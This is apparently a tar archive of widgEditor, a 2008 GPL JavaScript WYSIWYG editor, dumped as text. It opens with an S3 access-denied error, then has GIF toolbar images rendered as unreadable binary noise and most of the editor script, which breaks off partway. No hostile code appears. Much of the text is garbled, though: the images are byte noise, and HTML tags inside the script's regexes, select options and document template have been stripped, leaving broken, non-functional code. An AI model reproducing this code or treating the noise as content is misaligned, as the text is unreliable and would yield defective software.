0ustar00 AccessDeniedAccess DeniedAS3DC7Y06SVT2903UkoT+gpg5LxYCCpL0BLugFM3nFi1A9IoiUQK8Bq9hDo2jopJnVq8jmUP41350SMZV9/n+XSUEIE=widgEditor/__MACOSX/scripts/._widgEditor.js000064400000000122151032724670014502 0ustar00 2 RTEXTwidgEditor/__MACOSX/._example.htm000064400000000122151032724670012521 0ustar00 2 RTEXTwidgEditor/images/widgeditor_button_italic.gif000064400000002350151032724670015671 0ustar00GIF89aZ?fffKKKDDDʼn444+*(RRR@@@~vĺƻ\WHkeS̾ɽ¡ϫ¸ţȦ˨ͩf!?,Z)df8,ڞШtj+6,vۋvݖ0-hn˭nN=sq::;//=9:9 ~VX PDU$ tQG1ҁRJ+0K٤3Ӈ Q$8`O"SUVyW/zUUY8d]<b;cc~fda q̒L61TVi@S~)&^vJrl)^h g|yjB &zh2ڨ"JhVj))TV! ꨤJꩨ~zª 0(ꪪ' 캪~JȲ@  , JkLA:Ѐ +.0A [@+ĻK/ LA;  0/<DpHPg\X%T$L@,,r$*1- 8眳 @m3 #'5848448)8''>%-¾43)53ř-6-Ș02ɘ@!q 09JM{NGs縍Hr7^e)&N$ _U Tǒŋ[wQ&]٬Z8%NC:96CF}ֵ}ܓ>4?ACD REmCGtaEtRJ+L"4Bc?N:M-uԍ$hcSSm%X5֖XdjG6i=EW vQiE ؖe6d`Jih9beNp)e1 x橧xB@ &`h袉*(BV:b.@**`ꩨB* *묲 X@Bj : hBRk d8x;ZPAЦ+/`["| 8@o\0($LT 4+B2h2 H A4 @6l8@"h@63 sPG 8GϢ 0?`p"lp]?@nqFv ۀ.yn8~ Cn䓿 w[ n*:+. n.;㾂'{O 3Wo;widgEditor/images/widgeditor_button_empty.gif000064400000001156151032724670015565 0ustar00GIF89a<ú\]\לLLLǞˮ!,<'~]ihڍcp,^nxNpH,qtJZQT)7PV*7<~vS^Y~r OOΝ     /<*\Ȱ< "J8QE(R8/Ǐ CyჇ(S\reI-cDÅ rɳ,DJQAX" PgңU?H4يD+ׯBXKV1cxm5pcNpe!Az3"G+´1%Ǝ#bEX\Uϳ<KӾ)[ͺ3kКɞm3l8tʩGy)/lHz‡#n̞QE GəU<>}͛>D,B;widgEditor/images/widgeditor_button_image.gif000064400000002520151032724670015505 0ustar00GIF89aZ?ź'''̩ɦ˨Ƥ褤KKKDDDRRRϫ ţøá[UGȽʿΪ˨ΫidRɿǥͩa\LΪ˷f!?,Z'(Ȥ`8,zШt)6_Vzgw*`BlV݆5N` 3}}0-};- ;> >2 2 2!>>07$$$$ )> > ST4nHQ&TqE'F@Nj|\ bɒ#_&˕3kq.|1AӧI}pjtjԧOGP"N U*׬7mYnnݯnk. }@a>?('J옱˘3k̹9B-2ӤM@h9`p ul9X(QbDȓ+'^\HУKޣs*ة<c1_?zi3'ugGB(<ʀXb@ I'HvK)<+Jʄb :L00 22 a5\C5.>W88< ;3s=JC NB $s!MtRGitј]LM*KgDMm4%=OQuTT{VN]EUQV %nW>5X|YN='[ou Wr=^VX`6as9V(>٭fV]nz=f[l,jWp]qUK]sBTvmi¸k(h;D ЮA/nPA'G`p70/`@Ͽs@;widgEditor/images/widgeditor_toolbar_bg.gif000064400000000417151032724670015145 0ustar00GIF89a0!,0,˥:8RGD0A1@FbdtД ;widgEditor/images/widgeditor_button_unordered.gif000064400000002267151032724670016422 0ustar00GIF89aZ?RRRDDDJJJNNN'''FFF˨ʧ[VGȽ҉襥ҝhbQøźϫƼɦΪ̩ ţf!?,ZW)de8,ƞШt+6oVf_%p\tZ|֪D|NJC5~s{~{y y6==66y:y9:9ʰy55y=y2y0 H e)TkzżydLjS}taϧiޗ[6ou7\mk]ܳ;@='L7DARWmRS]t`{A^C%u%xvfm7{w~]]^7/>D;widgEditor/images/widgeditor_button_ordered.gif000064400000002347151032724670016056 0ustar00GIF89aZ?RRRDDDJJJNNN$$$(((&&&FFFƼø˨ʧȾ_ZJ辴扉ҪźϫɦΪ̩ ţf!?,Z)Ȥf8,ʞШt*+6m2Vf_8#n\tZ|֪ě|NMEU~s{~{yy5>>5y9>9y898̰y3ۧ333>y> HA yb(\ȰÇy&Hءċ3JCG[CI#!}tȲ%K(=f0qfE>NUL@ѣfFXRLJ:իXj:Sׯ`ÊKĎg ;ʝK\?2d׮^&B L_Bz(^̸SLE[2w?0yFZ ú5}b4ϠB{`CZI*QZX,QF)/n F)5_{˒K,|3Kv}5຅ ~םb tЂ)Ѓ2F,id!FIzI)҈0XOܔNXbG ԌE)6TPM#SmX)֐DZ^!lC_PZhOF e=c a—`)& hl& t t) xŸ!(rJh $hB£R vJrir)6ꪬvz* 4C 믾+ª+.. Ϫ`VfӦ+ ¹,+)[ ֻ+ԛ/[ &\ ;7k1?l 10P0r+*o <8+>-+@>C57tG|4muJ}qVO]#kawM]p-l`w #ܭxߝlc >x ~0xc 9/睃B螏ι?p鬷ꈩ.A;widgEditor/images/widgeditor_button_link.gif000064400000002426151032724670015365 0ustar00GIF89aZ?ɖRRRDDDJJJNNN(((ieYFFFȼ˨Ǽʧ^YI熆+/7ъĹϫáΪ̩ƣȥf!?,Z)df8,ƞШt+6m1Vf_!n\tZ|֪ě|NDM~s{~{yy;;y:2y2''2'22>о˺<<>>>㞡CO'衛\|`H@a@hΡ0qbĎ5ȓ(#Hp\ɲ˗)ixc&K8Yjɳ@ihAѣHj錦PJm X^͚uVYa1lgǪPZ~ȁ,ݺw=Wn , +&Đ#Kر3k̹eTBS<ǖ]N?a#o޴F=Ms߁ 3ߔ1RIA}Tֳlwcݪ<ƚ L20+cL4jv1ۿs=uO< AS;=t?\4U B % AavRE=CFԑ'D IԘxb4(#dK7SM,aԏ@ҀYRDifR=5ՒQafX_qX\aVZz]V[lny٥W{ZIkf9ٜY&x|*`)*蠄C(6)4)pzA.ij$i*(B-j+ Z+Zk+kl#$l,Z´Vk-.\[B୷*B*k@* oһ@\0!p  $ sqO< >MQRH;widgEditor/images/logo.gif000064400000011410151032724670011545 0ustar00GIF89ai :'H Zt 桏XЃ| (L W0 gH d ?X-`4\H"HL&:C7Q XЊM H2hL6>!Xx.|h k IBL"F:ґ0$aG{T@ @JЀޢBІ:D'JъZT\B-*z GoQ )@ (MJWҖ0LgJSj^HwSi]hJԢHMRԦ:KF;5XXͪVIlZXJֲhMZֶU VJ׫f^׾ `KV[X\:u2a㲘ͬf7z hGYuA HjWֲV pg@ͭnwm<@?M8ЍtKZͮv+/<}xK|z^/ /LN ,[? 'La ap6{ GL"BF;ѐ'MJ[N{Ӡ_`ҨNWJ# fMZָFMbN}]ЎMjXn{[E&6?N׍n?I6Mzη~FQ AP OSŽ@[ϸ7{ 8(`$Xhh~g" fN8Ϲw?аH?:0+IԧN[XϺַw]yHnxhOπc{/xϻ? 3~v[ϼ7{}0Jpw<1\gO{w OO;}O}S 8P{O:Low? a? Ͽ8XQ` p608X8`؁؁@&x(*,؂.028M v:<ȃS48DXFx4 i oЄNP6NpXZ\؅^`b8dĀvjmepr8oH @xz|H6S0Xx؈8GЇȇ`؉E PxEpG8Xxx= 0Xhp 0EЌ8XxؘX=0pTp蘎긎؎8X8؏8i0 E`YyiJؐsЎT0Yyّ I p(*mp D294Y6y8:<ٓ>2 谒DY'9 P@LٔNPR9TYVyXɔL0Е^`p IfyhjJsp gqY\OYz|ٗ~9Yyz@spg0PИs1ٙy1p9 4@ ip9Yyٛ9pi09@OPŹ;9Yyؙڹٝ9x09@ YyI9YyٟIn@40 Z0٠9Wpz 9$Z&z(*,ڢ.0% In`* @B:D*Jp@5PKp OZXZ(n0Ij 5@-`W%lڦnpr:tZvzxnZn: <5@z{Zڨ:Zz*2Ш-p ڪ:ZzpګWp2Z*ʺڬ:Zz̚PWp -˪ګrp蚮꺮ڮ:

@BpHNƐ . PV{XZ\۵^`bpdkh{ Ut[v{xz|۷~x{o{@ wK Ph{u{;[{۹   ` ,0, ;[{ۻk k {((м;[{؛ ˼ ʋ۾;[{/ ۿ` [뿅| l ܠ   "<$\&*),4\6|8:<>@9PF:LF0PR18}7717>}71>v} 1 > }4 44> v}3٣341313>55> j } W`|}`HD 2qb CʘqB!!S˖'}D8f>6r$8e9N>#ӧMOBaXjzrk`Ê+U]`۷pV}@ݻxV߿oa%ǐ#K (k̠CٳS^ͺiTbSA=ǖ]n?a#o޴F=9Db :y(#FG$B:BjT)J̫#+Zl¥d"6Wd0p4YC`57tO64/嘳`:٬ңJM4j?5SRM2ٔRG66ՖBIj[UWZv֙epjpכoלtڅbxrէ*[Jojhyڣ&Vj饘r`t駠Cp* 0jAk*$@k$`K;. ƺõ0v~ |p➋>[»%û)K@ <+o¿&/ ^BlC<0 - o -\-2-r p <-94 <,tJ+P;B,dsY_5,5b,gg+6lǍ}n-rMw9#`OgNz&謷ޮ*dpAN{*\ `od7ϼ/g=l}?׏/~_ϏP@ ?L 8 ;widgEditor/scripts/widgEditor.js000064400000122710151032724670013005 0ustar00/* ** File: widgEdit.js ** Created by: Cameron Adams (http://www.themaninblue.com/) ** Created on: 2005-01-16 ** Last modified: 2008-03-01 ** ** ** ** ** License Information: ** ------------------------------------------------------------------------- ** Copyright (C) 2008 Cameron Adams ** ** This program is free software; you can redistribute it and/or modify it ** under the terms of the GNU General Public License as published by the ** Free Software Foundation; either version 2 of the License, or (at your ** option) any later version. ** ** This program is distributed in the hope that it will be useful, but ** WITHOUT ANY WARRANTY; without even the implied warranty of ** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ** General Public License for more details. ** ** You should have received a copy of the GNU General Public License along ** with this program; if not, write to the Free Software Foundation, Inc., ** 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ** ** ** ** ** Purpose: ** ------------------------------------------------------------------------- ** ** Replaces all textareas (class="widgEditor") in a HTML document with ** enhanced editing windows to allow basic HTML formatting in a WYSIWYG ** manner. ** ** ** ** ** Function list: ** ------------------------------------------------------------------------- ** ** run() ** ** widgInit() ** ** widgEditor(replacedTextareaID) ** widtEditor.cleanPaste() ** widgEditor.cleanSource() ** widgEditor.convertSPANs(theSwitch) ** widgEditor.detectPaste(e) ** widgEditor.initEdit() ** widgEditor.insertNewParagraph() ** widgEditor.modifyFormSubmit() ** widgEditor.paragraphise() ** widgEditor.refreshDisplay() ** widgEditor.switchMode() ** widgEditor.updateWidgInput() ** widgEditor.writeDocument() ** ** widgToolbar() ** widgToolbar.addButton(theID, theClass, theLabel, theAction) ** widgToolbar.addSelect(theID, theClass, theContentArray, theAction) ** widgToolbar.disable() ** widgToolbar.enable() ** widgToolbar.setState(theState, theStatus) ** ** widgToolbarAction() ** ** widgToolbarCheckState(theWidgEditor, resubmit) ** ** widgToolbarMouseover() ** ** acceptableChildren(theNode) ** ** changeNodeType(theNode, nodeType) ** ** replaceNodeWithChildren() ** ** String.addClass(theClass) ** String.classExists(theClass) ** String.isAcceptedElementName() ** String.isInlineName() ** String.removeClass(theClass) ** String.reverse() ** String.validTags() */ /****************************************************************************** ** CONFIGURATION VARIABLES ******************************************************************************/ /* Location of stylesheet file for editor content */ var widgStylesheet = "css/widgContent.css"; /* Items to appear in toolbar. */ var widgToolbarItems = new Array(); widgToolbarItems.push("bold"); widgToolbarItems.push("italic"); widgToolbarItems.push("hyperlink"); widgToolbarItems.push("unorderedlist"); widgToolbarItems.push("orderedlist"); widgToolbarItems.push("image"); widgToolbarItems.push("htmlsource"); widgToolbarItems.push("blockformat"); /* Options on block format select element. Consists of string pairs (option value, option label) */ var widgSelectBlockOptions = new Array(); widgSelectBlockOptions.push("", "Change block type"); widgSelectBlockOptions.push("

", "Heading 1"); widgSelectBlockOptions.push("

", "Heading 2"); widgSelectBlockOptions.push("

", "Heading 3"); widgSelectBlockOptions.push("

", "Heading 4"); widgSelectBlockOptions.push("

", "Heading 5"); widgSelectBlockOptions.push("
", "Heading 6"); widgSelectBlockOptions.push("

", "Paragraph"); /* If widgInsertParagraphs = true, when content is submitted paragraphs will be ** inserted around text without a parent element. Mozilla does not ** automatically do this, so if this is set to false you will end up with some ** plain text blocks. Uses a double
as a pargraph marker. */ var widgInsertParagraphs = true; /* If widgAutoClean = true, when content is pasted into the WYSIWYG view, it ** will automatically be cleaned. If widgAutoClean = false, the user will be ** prompted as to whether they wish to clean the content. */ var widgAutoClean = false; /****************************************************************************** ** END CONFIGURATION ******************************************************************************/ run(); function run() { var oldOnload = window.onload; if (typeof(window.onload) != "function") { window.onload = widgInit; } else { window.onload = function() { oldOnload(); widgInit(); } } } function widgInit() { /* Detects if designMode is available, and also if browser is IE or Mozilla (excludes Safari) */ if (typeof(document.designMode) == "string" && (document.all || document.designMode == "off")) { var theTextareas = document.getElementsByTagName("textarea"); for (var i = 0; i < theTextareas.length; i++) { var theTextarea = theTextareas[i]; if (theTextarea.className.classExists("widgEditor")) { if (theTextarea.id == "") { theTextarea.id = theTextarea.name; } setTimeout("new widgEditor('" + theTextarea.id + "')", 500 * (i)); } } } else { return false; } return true; } function widgEditor(replacedTextareaID) { var self = this; this.theTextarea = document.getElementById(replacedTextareaID); this.theContainer = document.createElement("div"); this.theIframe = document.createElement("iframe"); this.theInput = document.createElement("input"); this.theExtraInput = document.createElement("input"); this.IE = false; this.locked = true; this.pasteCache = ""; this.wysiwyg = true; if (document.all) { this.IE = true; } if (this.theTextarea.id == null) { this.theTextarea.id = this.theTextarea.name; } this.theTextarea.style.visibility = "hidden"; /* Modify DOM objects for editor */ this.theContainer.id = this.theTextarea.id + "WidgContainer"; this.theContainer.className = "widgContainer"; this.theIframe.id = this.theTextarea.id + "WidgIframe"; this.theIframe.className = "widgIframe"; this.theInput.type = "hidden"; this.theInput.id = this.theTextarea.id; this.theInput.name = this.theTextarea.name; this.theInput.value = this.theTextarea.value; this.theToolbar = new widgToolbar(this); /* An extra input to determine if the submitted data is from the normal textarea or from the widgEditor */ this.theExtraInput.type = "hidden"; this.theExtraInput.id = this.theTextarea.id + "WidgEditor"; this.theExtraInput.name = this.theTextarea.name + "WidgEditor"; this.theExtraInput.value = "true"; this.theTextarea.id += "WidgTextarea"; this.theTextarea.name += "WidgTextarea"; this.theContainer.appendChild(this.theToolbar.theList); this.theContainer.appendChild(this.theIframe); this.theContainer.appendChild(this.theInput); this.theContainer.appendChild(this.theExtraInput); this.theContainer.style.visibility = "hidden"; this.theInput.widgEditorObject = this; this.theTextarea.parentNode.replaceChild(this.theContainer, this.theTextarea); /* Fill editor with old textarea content */ this.writeDocument(this.theInput.value); /* Make editor editable */ this.initEdit(); /* Attach onsubmit to parent form */ this.modifyFormSubmit(); return true; } /* Clean pasted content */ widgEditor.prototype.cleanPaste = function() { if (widgAutoClean || confirm("Do you wish to clean the HTML source of the content you just pasted?")) { var matchedHead = ""; var matchedTail = ""; var newContent = this.theIframe.contentWindow.document.getElementsByTagName("body")[0].innerHTML; var newContentStart = 0; var newContentFinish = 0; var newSnippet = ""; var tempNode = document.createElement("div"); /* Find start of both strings that matches */ for (newContentStart = 0; newContent.charAt(newContentStart) == this.pasteCache.charAt(newContentStart); newContentStart++) { matchedHead += this.pasteCache.charAt(newContentStart); } /* If newContentStart is inside a HTML tag, move to opening brace of tag */ for (var i = newContentStart; i >= 0; i--) { if (this.pasteCache.charAt(i) == "<") { newContentStart = i; matchedHead = this.pasteCache.substring(0, newContentStart); break; } else if(this.pasteCache.charAt(i) == ">") { break; } } newContent = newContent.reverse(); this.pasteCache = this.pasteCache.reverse(); /* Find end of both strings that matches */ for (newContentFinish = 0; newContent.charAt(newContentFinish) == this.pasteCache.charAt(newContentFinish); newContentFinish++) { matchedTail += this.pasteCache.charAt(newContentFinish); } /* If newContentFinish is inside a HTML tag, move to closing brace of tag */ for (var i = newContentFinish; i >= 0; i--) { if (this.pasteCache.charAt(i) == ">") { newContentFinish = i; matchedTail = this.pasteCache.substring(0, newContentFinish); break; } else if(this.pasteCache.charAt(i) == "<") { break; } } matchedTail = matchedTail.reverse(); /* If there's no difference in pasted content */ if (newContentStart == newContent.length - newContentFinish) { return false; } newContent = newContent.reverse(); newSnippet = newContent.substring(newContentStart, newContent.length - newContentFinish); newSnippet = newSnippet.validTags(); /* Replace opening bold tags with strong */ newSnippet = newSnippet.replace(/)/g, ")/g, ")/g, ")/g, "]*>/g, function(match) { match = match.replace(/ ([^=]+)="[^"]*"/g, function(match2, attributeName) { if (attributeName == "alt" || attributeName == "href" || attributeName == "src" || attributeName == "title") { return match2; } return ""; }); return match; } ); tempNode.innerHTML = newSnippet; acceptableChildren(tempNode); this.theInput.value = matchedHead + tempNode.innerHTML + matchedTail; /* Final cleanout for MS Word cruft */ this.theInput.value = this.theInput.value.replace(/<\?xml[^>]*>/g, ""); this.theInput.value = this.theInput.value.replace(/<[^ >]+:[^>]*>/g, ""); this.theInput.value = this.theInput.value.replace(/<\/[^ >]+:[^>]*>/g, ""); this.refreshDisplay(); /* Convert semantics to spans in Mozilla */ if (!this.IE) { this.convertSPANs(); } } return true; } /* Clean the HTML code of the content area */ widgEditor.prototype.cleanSource = function() { var theHTML = ""; if (this.wysiwyg) { theHTML = this.theIframe.contentWindow.document.getElementsByTagName("body")[0].innerHTML; } else { theHTML = this.theTextarea.value; } theHTML = theHTML.validTags(); /* Remove leading and trailing whitespace */ theHTML = theHTML.replace(/^\s+/, ""); theHTML = theHTML.replace(/\s+$/, ""); /* Remove style attribute inside any tag */ theHTML = theHTML.replace(/ style="[^"]*"/g, ""); /* Replace improper BRs */ theHTML = theHTML.replace(/
/g, "
"); /* Remove BRs right before the end of blocks */ theHTML = theHTML.replace(/
\s*<\/(h1|h2|h3|h4|h5|h6|li|p)/g, "]+[^\/])>/g, "$1 />"); /* Remove empty tags */ theHTML = theHTML.replace(/(<[^\/]>|<[^\/][^>]*[^\/]>)\s*<\/[^>]*>/g, ""); if (this.wysiwyg) { this.theIframe.contentWindow.document.getElementsByTagName("body")[0].innerHTML = theHTML; } else { this.theTextarea.value = theHTML; } this.theInput.value = theHTML; return true; } widgEditor.prototype.convertSPANs = function(theSwitch) { if (theSwitch) { /* Replace styled spans with their semantic equivalent */ var theSPANs = this.theIframe.contentWindow.document.getElementsByTagName("span"); while(theSPANs.length > 0) { var theChildren = new Array(); var theReplacementElement = null; var theParentElement = null; for (var j = 0; j < theSPANs[0].childNodes.length; j++) { theChildren.push(theSPANs[0].childNodes[j].cloneNode(true)); } /* Detect type of span style */ switch (theSPANs[0].getAttribute("style")) { case "font-weight: bold;": theReplacementElement = this.theIframe.contentWindow.document.createElement("strong"); theParentElement = theReplacementElement; break; case "font-style: italic;": theReplacementElement = this.theIframe.contentWindow.document.createElement("em"); theParentElement = theReplacementElement; break; case "font-weight: bold; font-style: italic;": theParentElement = this.theIframe.contentWindow.document.createElement("em"); theReplacementElement = this.theIframe.contentWindow.document.createElement("strong"); theReplacementElement.appendChild(theParentElement); break; case "font-style: italic; font-weight: bold;": theParentElement = this.theIframe.contentWindow.document.createElement("strong"); theReplacementElement = this.theIframe.contentWindow.document.createElement("em"); theReplacementElement.appendChild(theParentElement); break; default: replaceNodeWithChildren(theSPANs[0]); break; } if (theReplacementElement != null) { for (var j = 0; j < theChildren.length; j++) { theParentElement.appendChild(theChildren[j]); } theSPANs[0].parentNode.replaceChild(theReplacementElement, theSPANs[0]); } theSPANs = this.theIframe.contentWindow.document.getElementsByTagName("span"); } } else { /* Replace em and strong tags with styled spans */ var theEMs = this.theIframe.contentWindow.document.getElementsByTagName("em"); while(theEMs.length > 0) { var theChildren = new Array(); var theSpan = this.theIframe.contentWindow.document.createElement("span"); theSpan.setAttribute("style", "font-style: italic;"); for (var j = 0; j < theEMs[0].childNodes.length; j++) { theChildren.push(theEMs[0].childNodes[j].cloneNode(true)); } for (var j = 0; j < theChildren.length; j++) { theSpan.appendChild(theChildren[j]); } theEMs[0].parentNode.replaceChild(theSpan, theEMs[0]); theEMs = this.theIframe.contentWindow.document.getElementsByTagName("em"); } var theSTRONGs = this.theIframe.contentWindow.document.getElementsByTagName("strong"); while(theSTRONGs.length > 0) { var theChildren = new Array(); var theSpan = this.theIframe.contentWindow.document.createElement("span"); theSpan.setAttribute("style", "font-weight: bold;"); for (var j = 0; j < theSTRONGs[0].childNodes.length; j++) { theChildren.push(theSTRONGs[0].childNodes[j].cloneNode(true)); } for (var j = 0; j < theChildren.length; j++) { theSpan.appendChild(theChildren[j]); } theSTRONGs[0].parentNode.replaceChild(theSpan, theSTRONGs[0]); theSTRONGs = this.theIframe.contentWindow.document.getElementsByTagName("strong"); } } return true; } /* Check for pasted content */ widgEditor.prototype.detectPaste = function(e) { var keyPressed = null; var theEvent = null; if (e) { theEvent = e; } else { theEvent = event; } if (theEvent.ctrlKey && theEvent.keyCode == 86 && this.wysiwyg) { var self = this; this.pasteCache = this.theIframe.contentWindow.document.getElementsByTagName("body")[0].innerHTML; /* Because Mozilla can't access the clipboard directly, must rely on timeout to check pasted differences in main content */ setTimeout(function(){self.cleanPaste(); return true;}, 100); } return true; } /* Turn on document editing */ widgEditor.prototype.initEdit = function() { var self = this; try { this.theIframe.contentWindow.document.designMode = "on"; } catch (e) { /* setTimeout needed to counteract Mozilla bug whereby you can't immediately change designMode on newly created iframes */ setTimeout(function(){self.initEdit()}, 250); return false; } if (!this.IE) { this.convertSPANs(false); } this.theContainer.style.visibility = "visible"; this.theTextarea.style.visibility = "visible"; /* Mozilla event capturing */ if (typeof document.addEventListener == "function") { this.theIframe.contentWindow.document.addEventListener("mouseup", function(){widgToolbarCheckState(self); return true;}, false); this.theIframe.contentWindow.document.addEventListener("keyup", function(){widgToolbarCheckState(self); return true;}, false); this.theIframe.contentWindow.document.addEventListener("keydown", function(e){self.detectPaste(e); return true;}, false); } /* IE event capturing */ else { this.theIframe.contentWindow.document.attachEvent("onmouseup", function(){widgToolbarCheckState(self); return true;}); this.theIframe.contentWindow.document.attachEvent("onkeyup", function(){widgToolbarCheckState(self); return true;}); this.theIframe.contentWindow.document.attachEvent("onkeydown", function(e){self.detectPaste(e); return true;}, false); } this.locked = false; return true; } /* Add elements to a paragraph and inserts the paragraph before a given element in the body */ widgEditor.prototype.insertNewParagraph = function(elementArray, succeedingElement) { var theBody = this.theIframe.contentWindow.document.getElementsByTagName("body")[0]; var theParagraph = this.theIframe.contentWindow.document.createElement("p"); for (var i = 0; i < elementArray.length; i++) { theParagraph.appendChild(elementArray[i]); } if (typeof(succeedingElement) != "undefined") { theBody.insertBefore(theParagraph, succeedingElement); } else { theBody.appendChild(theParagraph); } return true; } /* Add submit listener to parent form */ widgEditor.prototype.modifyFormSubmit = function() { var self = this; var theForm = this.theContainer.parentNode; var oldOnsubmit = null; /* Find the parent form element */ while (theForm.nodeName.toLowerCase() != "form") { theForm = theForm.parentNode; } /* Add onsubmit without overwriting existing function calls */ oldOnsubmit = theForm.onsubmit; if (typeof theForm.onsubmit != "function") { theForm.onsubmit = function() { return self.updateWidgInput(); } } else { theForm.onsubmit = function() { self.updateWidgInput(); return oldOnsubmit(); } } return true; } /* Format the HTML with paragraphs. Any parentless text is enclosed in a paragraph, double breaks are paragraph markers */ widgEditor.prototype.paragraphise = function() { if (widgInsertParagraphs && this.wysiwyg) { var theBody = this.theIframe.contentWindow.document.getElementsByTagName("body")[0]; /* Remove all text nodes containing just whitespace */ for (var i = 0; i < theBody.childNodes.length; i++) { if (theBody.childNodes[i].nodeName.toLowerCase() == "#text" && theBody.childNodes[i].data.search(/^\s*$/) != -1) { theBody.removeChild(theBody.childNodes[i]); i--; } } var removedElements = new Array(); for (var i = 0; i < theBody.childNodes.length; i++) { if (theBody.childNodes[i].nodeName.isInlineName()) { removedElements.push(theBody.childNodes[i].cloneNode(true)); theBody.removeChild(theBody.childNodes[i]); i--; } else if (theBody.childNodes[i].nodeName.toLowerCase() == "br") { if (i + 1 < theBody.childNodes.length) { /* If the current break tag is followed by another break tag */ if (theBody.childNodes[i + 1].nodeName.toLowerCase() == "br") { /* Remove consecutive break tags */ while (i < theBody.childNodes.length && theBody.childNodes[i].nodeName.toLowerCase() == "br") { theBody.removeChild(theBody.childNodes[i]); } if (removedElements.length > 0) { this.insertNewParagraph(removedElements, theBody.childNodes[i]); removedElements = new Array(); } } /* If the break tag appears before a block element */ else if (!theBody.childNodes[i + 1].nodeName.isInlineName()) { theBody.removeChild(theBody.childNodes[i]); } else if (removedElements.length > 0) { removedElements.push(theBody.childNodes[i].cloneNode(true)); theBody.removeChild(theBody.childNodes[i]); } else { theBody.removeChild(theBody.childNodes[i]); } i--; } else { theBody.removeChild(theBody.childNodes[i]); } } else if (removedElements.length > 0) { this.insertNewParagraph(removedElements, theBody.childNodes[i]); removedElements = new Array(); } } if (removedElements.length > 0) { this.insertNewParagraph(removedElements); } } return true; } /* Update hidden input to reflect editor contents, for submission */ widgEditor.prototype.refreshDisplay = function() { if (this.wysiwyg) { this.theIframe.contentWindow.document.getElementsByTagName("body")[0].innerHTML = this.theInput.value; } else { this.theTextarea.value = this.theInput.value; } return true; } /* Switch between WYSIWYG and HTML source */ widgEditor.prototype.switchMode = function() { if (!this.locked) { this.locked = true; /* Switch to HTML source */ if (this.wysiwyg) { this.updateWidgInput(); this.theTextarea.value = this.theInput.value; this.theContainer.replaceChild(this.theTextarea, this.theIframe); this.theToolbar.disable(); this.wysiwyg = false; this.locked = false; } /* Switch to WYSIWYG */ else { this.updateWidgInput(); this.theContainer.replaceChild(this.theIframe, this.theTextarea); this.writeDocument(this.theInput.value); this.theToolbar.enable(); this.initEdit(); this.wysiwyg = true; } } return true; } /* Update hidden input to reflect editor contents, for submission */ widgEditor.prototype.updateWidgInput = function() { if (this.wysiwyg) { /* Convert spans to semantics in Mozilla */ if (!this.IE) { this.convertSPANs(true); } this.paragraphise(); this.cleanSource(); } else { this.theInput.value = this.theTextarea.value; } return true; } /* Write initial content to editor */ widgEditor.prototype.writeDocument = function(documentContent) { /* HTML template into which the HTML Editor content is inserted */ var documentTemplate = '\ \ \ INSERT:STYLESHEET:END\ \ \ INSERT:CONTENT:END\ \ \ '; /* Insert dynamic variables/content into document */ /* IE needs stylesheet to be written inline */ if (typeof document.all != "undefined") { documentTemplate = documentTemplate.replace(/INSERT:STYLESHEET:END/, ''); } /* Firefox can't have stylesheet written inline */ else { documentTemplate = documentTemplate.replace(/INSERT:STYLESHEET:END/, ""); } documentTemplate = documentTemplate.replace(/INSERT:CONTENT:END/, documentContent); this.theIframe.contentWindow.document.open(); this.theIframe.contentWindow.document.write(documentTemplate); this.theIframe.contentWindow.document.close(); /* In Firefox stylesheet needs to be loaded separate to other HTML, because if it's loaded inline it causes Firefox to have problems with an empty document */ if (typeof document.all == "undefined") { var stylesheet = this.theIframe.contentWindow.document.createElement("link"); stylesheet.setAttribute("rel", "stylesheet"); stylesheet.setAttribute("type", "text/css"); stylesheet.setAttribute("href", widgStylesheet); this.theIframe.contentWindow.document.getElementsByTagName("head")[0].appendChild(stylesheet); } return true; } /* Toolbar items */ function widgToolbar(theEditor) { var self = this; this.widgEditorObject = theEditor; /* Create toolbar ul element */ this.theList = document.createElement("ul"); this.theList.id = this.widgEditorObject.theInput.id + "WidgToolbar"; this.theList.className = "widgToolbar"; this.theList.widgToolbarObject = this; /* Create toolbar items */ for (var i = 0; i < widgToolbarItems.length; i++) { switch (widgToolbarItems[i]) { case "bold": this.addButton(this.theList.id + "ButtonBold", "widgButtonBold", "Bold", "bold"); break; case "italic": this.addButton(this.theList.id + "ButtonItalic", "widgButtonItalic", "Italic", "italic"); break; case "hyperlink": this.addButton(this.theList.id + "ButtonLink", "widgButtonLink", "Hyperlink", "link"); break; case "unorderedlist": this.addButton(this.theList.id + "ButtonUnordered", "widgButtonUnordered", "Unordered List", "insertunorderedlist"); break; case "orderedlist": this.addButton(this.theList.id + "ButtonOrdered", "widgButtonOrdered", "Ordered List", "insertorderedlist"); break; case "image": this.addButton(this.theList.id + "ButtonImage", "widgButtonImage", "Insert Image", "image"); break; case "htmlsource": this.addButton(this.theList.id + "ButtonHTML", "widgButtonHTML", "HTML Source", "html"); break; case "blockformat": this.addSelect(this.theList.id + "SelectBlock", "widgSelectBlock", widgSelectBlockOptions, "formatblock"); break; } } return true; } /* Add button to toolbar */ widgToolbar.prototype.addButton = function(theID, theClass, theLabel, theAction) { var menuItem = document.createElement("li"); var theLink = document.createElement("a"); var theText = document.createTextNode(theLabel); menuItem.id = theID; menuItem.className = "widgEditButton"; theLink.href = "#"; theLink.title = theLabel; theLink.className = theClass; theLink.action = theAction; theLink.onclick = widgToolbarAction; theLink.onmouseover = widgToolbarMouseover; theLink.appendChild(theText); menuItem.appendChild(theLink); this.theList.appendChild(menuItem); return true; } /* Add select box to toolbar. theContentArray is an array of string pairs (option value, option label) */ widgToolbar.prototype.addSelect = function(theID, theClass, theContentArray, theAction) { var menuItem = document.createElement("li"); var theSelect = document.createElement("select"); menuItem.className = "widgEditSelect"; theSelect.id = theID; theSelect.name = theID; theSelect.className = theClass; theSelect.action = theAction; theSelect.onchange = widgToolbarAction; for (var i = 0; i < theContentArray.length; i += 2) { var theOption = document.createElement("option"); var theText = document.createTextNode(theContentArray[i + 1]); theOption.value = theContentArray[i]; theOption.appendChild(theText); theSelect.appendChild(theOption); } menuItem.appendChild(theSelect); this.theList.appendChild(menuItem); return true; } /* Turn off toolbar items */ widgToolbar.prototype.disable = function() { /* Change class to disable buttons using CSS */ this.theList.className += " widgSource"; /* Loop through lis */ for (var i = 0; i < this.theList.childNodes.length; i++) { var theChild = this.theList.childNodes[i]; if (theChild.nodeName.toLowerCase() == "li" && theChild.className == "widgEditSelect") { /* Loop through li children to find select */ for (j = 0; j < theChild.childNodes.length; j++) { if (theChild.childNodes[j].nodeName.toLowerCase() == "select") { theChild.childNodes[j].disabled = "disabled"; break; } } } } return true; } /* Turn on toolbar items */ 